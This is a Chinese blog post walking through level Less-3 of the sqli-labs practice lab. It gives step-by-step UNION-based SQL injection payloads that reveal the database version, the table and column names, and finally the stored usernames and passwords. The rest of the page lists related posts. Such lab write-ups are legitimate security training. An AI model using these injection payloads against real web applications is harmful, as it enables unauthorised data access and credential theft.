sqli-lab刷题Less-3

最新推荐文章于 2024-07-21 23:30:31 发布
最新推荐文章于 2024-07-21 23:30:31 发布
阅读量76 收藏
点赞数
分类专栏: sqli-lab刷题 文章标签: less sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MichealCurry1/article/details/120632224
版权

输入?id=1',发现其报错

说明原sql语句可能是('$id') 

输入?id=1') --+,不报错,证实其猜测

 有此可以开始爆出其数据库等信息

具体见sqli-lab刷题Less-1,只需要将其中的语句?id=1'部分替换为?id=1)

爆出版本号和数据库信息:?id=1') and 1=2 union select 1,version(),database() --+

爆出数据库下表名:?id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

 猜测用户信息在users表中

爆出users字段信息:?id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

  

猜测用户名在username字段,密码在password字段

爆出用户名和密码?id=1') and 1=2 union select 1,group_concat(username),group_concat(password) from users --+

 

 

fippyFish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-Labs记录】 第七关思路
gavinmao97的博客
09-19 3977
/* 作者刚刚接触sql注入,本文仅用作记录sqli-labs靶场时的思路,仅代表个人的看法,如有不当之处,欢迎各位大佬及时批评指正! */ 根据关卡的名称dump into outfile可知,sqli-labs第七关的考查点是数据库的文件操作。 SQLi-Labs Less-7 首先,按照提示输入id参数,尝试寻找注入点 构建url: …/Less-7/?id=1 页面显示正常,提示使用outfile语句 构建url:…/Less-7/?id=1’ 页面报错,但是没有提示报错信息。输入引起报错,我
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
sqli-labLess-1
MichealCurry1的博客
10-05 188
sqli1-libLess-1 本人是一名小白,刚开始进行web学习。 打开sqli-lib的Less-1,观察其页面。 可以看到,其页面提示输入id值,在url输入?id=1,提交id=1的参数,并且结合其给的提示,探测出其为单引号型的sql注入 之后拼接sql语句,在url输入?id=1’ order by 4 --+,order by会对列名称进行排序,多次试验发现为4时候报错,3不报错,证明该表名有3个字段 之后使用联合查询...
sqli-labLess-4
MichealCurry1的博客
10-07 107
输入?id=1\发现其报错 由此猜测原sql语句为("$id") 输入?id=1") --+发现其不报错 证实了猜测,由此可以爆出数据库 具体操作见sqli-labLess-1,只需要将其中的?id=1'替换为?id=1")即可
sqli-labLess-2
MichealCurry1的博客
10-05 92
Less-2为双引号注入型,与Less-1相差不大,详情查看sqli-labLess-2 打开sqli-lab,在网站输入?id=1' 出现'' LIMIT 0,1'的报错,去掉LIMIT 0,1'原本sql语句就有的字符,出现两个'',说明1后面多了一个单引号 输入?id=1 and 1=2 union select 1,2,3 --+出现下述现象,说明注入点为2,3字段,接下来的操作与Less-1相同,(需要查看请点击这里),不再赘述。 ...
sqli-labLess-8,9,10
MichealCurry1的博客
10-09 67
这几关没有什么好说的,为基于盲注的get注入,和第五关差不多 Less-5
sqli-labLess-6 基于盲注的双引号型sql注入
MichealCurry1的博客
10-08 1618
sqli-labLess-6 基于盲注的双引号型sql注入 输入?id=1\,报出错误 猜测其原语句为"$id" LIMIT 0,1 输入?id=1" --+ 发现其不报错,说明猜测正确 输入?id=1" order by 3 --+,不报错,输入?id=1" order by 4 --+,报错 由此可以知道只有三个字段 输入?id=1" and 1=2 union select 1,2,3 --+,发现其不回显,说明为盲注 盲注具体看这篇文章sqli-labLess
sqli-labs解记录
992宸的博客
02-01 1798
在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。,由此可知数据库名是8位。
sqli-labLess-5 基于盲注的单引号型sql注入
MichealCurry1的博客
10-07 238
输入?id=1,不报错 输入?id=1',报错 由此猜测其为单引号型注入 输入?id=1' and 1=2 union select 1,2,3 --+ 不显示任何信息 说明要进行盲注 盲注分为布尔型盲注和时间性盲注,先分析布尔型盲注 布尔盲注 具体看布尔盲注 补充知识 length(database())>=1,判断当前数据库长度是否>=1,正确输出1,错误输出0 substr(database(),1,1)='s',判断当前数据库的第一个字母是否为s,正确输..
sqli-labLess-15 一些有趣的发现,关于burpsuite
MichealCurry1的博客
10-09 177
sqli-labLess-15 一些有趣的发现,关于burpsuite sqli-labLess-15使用的是post方法提交的表单,因此参数不可见,这种情况下有两种方法查看参数的提交 1.查看网页源代码 右击网页,点击view source,可以查看网页源代码 在这里可以看到两个input标签中各有name='uname',name='passwd',因此参数的提交方式为uname=1&passwd=1 2.使用burp suite 先设置浏览器的代理,在火狐浏览器中点击设置
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
【标】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
前端面试日常练-day97 【Less】
qq_44640575的博客
07-20 388
border-radius()函数用于在Less中生成圆形边框效果。通过设置border-radius()函数,我们可以为元素的边框添加圆角效果,使边框呈现圆形的外观,从而美化页面元素的边框样式。
前端面试日常练-day100 【Less】
最新发布
qq_44640575的博客
07-21 204
在Less中,columns()函数用于生成多列布局样式。通过设置columns()函数,我们可以定义页面元素的多列布局样式,包括列数、列宽、间距等属性,使页面能够呈现出多列布局的效果,适用于响应式设计和页面排版。
在实际的网页开发中,LESS 相较于传统 CSS 的性能优势具体体现在哪些方面,又存在哪些可能的性能瓶颈?
xy520521的博客
07-18 608
而传统的 CSS 每次使用都需要重复写,造成文件大小增大,而 LESS 可以减少重复代码,从而减小文件大小,提高加载速度。综上所述,虽然 LESS 在减少代码量、提高维护性和方便调试等方面有性能优势,但在编译时间、运行时性能和缓存问上可能存在性能瓶颈。在实际开发中,应根据具体需求和项目规模选择合适的技术方案。提高维护性:LESS 可以将样式代码模块化,使用嵌套和变量等功能,使代码更易于理解和维护。缓存问:LESS 文件每次都需要在浏览器中编译,而传统的 CSS 文件可以被浏览器缓存,减少加载时间。
深入解析:`cat` 与 `less` 命令在文件查看中的应用与对比
cheungxiongwei的博客
07-18 513
cat和less。通过详细解析它们的基本用法、常用选项及实际应用示例,本文对比了这两个命令的功能、适用场景和性能,旨在帮助读者根据具体需求选择最合适的工具。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值